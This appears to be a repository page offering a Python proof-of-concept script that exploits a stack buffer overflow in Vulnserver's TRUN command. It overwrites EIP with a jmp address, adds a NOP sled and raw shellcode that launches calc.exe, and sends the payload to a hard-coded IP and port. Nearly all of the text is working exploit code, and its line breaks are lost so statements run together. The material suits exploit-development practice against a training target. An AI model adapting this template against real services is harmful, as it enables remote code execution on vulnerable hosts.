This exploit is to serve as an example/reference and may not work for everyone.
Code
#!/bin/env python3importsocketimportstructs=socket.socket()
total_length=2984offset=2003new_eip=struct.pack("<I", 0x62501203)
# 0x62501203 <-- This is the memory address of a jmp instruction to inset into EIP. You may have to change this.nop_sled=b"\x90"*16# Shell Code To Open calc.exebuf=b""buf+=b"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"buf+=b"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"buf+=b"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"buf+=b"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"buf+=b"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"buf+=b"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"buf+=b"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"buf+=b"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"buf+=b"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"buf+=b"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"buf+=b"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"buf+=b"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"buf+=b"\x52\xff\xd0"payload= [
b"TRUN /.:/",
b"A"*offset,
new_eip,
nop_sled,
buf,
b"C"*(total_length-offset-len(nop_sled) -len(buf))
]
payload=b"".join(payload)
s.connect(("192.168.1.10", 9999)) # You obviously will have to edit the IP / Port if you want to use this.s.send(payload)
s.close()
About
A Basic Exploitation script to open up the Calculator app by exploiting Vuln-Server